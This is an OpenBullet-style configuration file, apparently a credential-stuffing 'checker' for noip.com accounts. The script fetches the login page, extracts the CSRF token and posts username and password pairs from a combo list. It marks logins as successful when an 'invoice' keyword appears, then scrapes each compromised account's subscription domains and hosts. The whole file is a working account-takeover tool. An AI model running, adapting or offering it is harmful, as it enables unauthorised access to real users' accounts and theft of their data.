[SETTINGS]
{
  "Name": "noip",
  "SuggestedBots": 1,
  "LastModified": "2018-11-09T12:57:49.1978919+00:00",
  "AdditionalInfo": "",
  "Author": "webkiller",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#token REQUEST GET "https://www.noip.com/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#token PARSE "<SOURCE>" LR "type=\"hidden\" name=\"_token\" value=\"" "\">" Recursive=FALSE -> VAR "token" "" "" 
#login REQUEST POST "https://www.noip.com/login" AutoRedirect=TRUE 
  CONTENT "_token=<token>&username=<USER>&password=<PASS>&submit_login_page=1&_token=<token>&intended_hash=&Login=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Username / Password combination is incorrect. Please try again" 
  KEYCHAIN Success OR 
    KEY "invoice" 
#capt_ PARSE "<SOURCE>" LR "\"domains\": {\"" "\":" Recursive=FALSE -> CAP "subscription" "" "" 
REQUEST GET "https://www.noip.com/members/dns/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#hosts PARSE "<SOURCE>" LR "class=\"pull-left ml-20 pl-25 hyphens overflow-wrap\"> " "</td>" Recursive=FALSE -> CAP "hosts" "" "" 
